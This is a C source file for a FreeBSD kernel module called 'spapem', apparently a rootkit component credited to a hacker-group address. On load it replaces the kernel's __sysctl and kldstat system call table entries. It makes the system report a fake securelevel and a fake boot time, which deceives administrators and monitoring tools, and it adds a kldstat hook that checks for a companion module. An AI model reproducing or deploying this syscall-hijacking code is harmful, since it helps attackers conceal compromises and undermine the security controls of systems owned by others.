#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/sysent.h>
#include <sys/sysproto.h>
#include <sys/sysctl.h>
#include <sys/linker.h>
#include <sys/unistd.h>

#include "spapem.h"

static int spapem___sysctl(struct proc *p, struct sysctl_args *uap)
	{
	int ret;
	const int fake =FAKE_SECURELVL;
	struct timeval fake_uptime;

	ret = __sysctl(p, uap);

	if(uap->namelen == 2 && uap->name[0] == CTL_KERN)
		{
		if(uap->name[1] == KERN_SECURELVL && uap->old != NULL)
			memcpy( uap->old, &fake, sizeof(fake));
		if(uap->name[1] == KERN_BOOTTIME)
			{
			fake_uptime.tv_sec = FAKE_SEC;
			fake_uptime.tv_usec = FAKE_USEC;
			if(uap->old != NULL)
				memcpy(uap->old, &fake_uptime, 
							sizeof(fake_uptime));
			}
		}

	return ret;
	}

static int spapem_kldstat(struct proc *p, struct kldstat_args *uap)
	{
	int ret =kldstat(p, uap);

	if(!strcmp(uap->stat->name, "spapem_core.ko"))
		uprintf("\n spapem don't hide him kld %s\n",
					uap->stat->name);
	return ret;
	}

static struct sysent spapem[2] =
	{
	{ 6, (sy_call_t *) spapem___sysctl },
	{ 2, (sy_call_t *) spapem_kldstat }
	};

static int init_module(module_t mod, int cmd, void *arg)
	{
        int ret = 0;

        switch (cmd) 
		{
		case MOD_LOAD:
			sysent[SYS___sysctl] =spapem[0];
			sysent[SYS_kldstat] =spapem[1];
			uprintf(" loadated \"spapem\" by vecna@s0ftpj.org \n");
			break;
		case MOD_UNLOAD:
			sysent[SYS___sysctl].sy_call =(sy_call_t *)__sysctl;
			sysent[SYS_kldstat].sy_call =(sy_call_t *)kldstat;
			uprintf(" unloaded ? bye, and tnx\n");
			break;
		default:
			ret = EINVAL;
			break;
		}
        return(ret);
	}

static struct moduledata spapem_moddata =
	{
	"spapem",
	init_module,
	NULL
	};

DECLARE_MODULE(syscall, spapem_moddata, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
